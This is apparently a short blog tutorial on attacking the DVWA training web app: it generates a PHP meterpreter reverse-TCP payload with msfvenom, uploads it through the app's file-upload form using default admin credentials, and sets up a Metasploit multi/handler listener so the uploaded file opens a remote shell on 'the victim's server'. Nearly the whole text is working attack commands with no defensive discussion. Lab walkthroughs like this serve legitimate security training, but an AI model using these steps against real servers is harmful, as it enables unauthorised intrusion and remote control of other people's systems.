Open your kali linux terminal and type
msfvenom -p
php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw
It will generate a raw code of php file
Now copy the generated code in the text file and save it on
your desktop with .php extension
Now open the DVWA Webapp in your server and login with
following credentials:
Username - admin
Password -
password
Now scroll to the File
Upload section in left pane and upload the above created php file
When you will finish uploading your php file, it will show
you the path
Now open your uploaded file in browser
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4444
exploit
Now you can access the victim's server
0 comments:
Post a Comment